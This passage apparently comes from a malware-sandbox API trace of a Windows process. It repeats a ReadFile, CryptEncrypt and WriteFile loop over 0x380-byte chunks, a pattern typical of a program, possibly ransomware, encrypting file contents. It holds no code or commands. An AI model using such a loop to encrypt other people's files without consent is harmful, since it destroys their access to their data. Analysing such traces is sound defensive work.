lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.257] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.257] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.257] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.258] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.258] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.258] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.258] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.258] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.259] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.259] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.259] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.259] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.259] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.260] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.260] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.260] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.260] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.260] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.262] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.262] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.262] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.262] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.262] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.262] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.263] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.263] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.264] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.265] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.265] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.265] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.265] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.266] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.267] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.267] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.267] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: 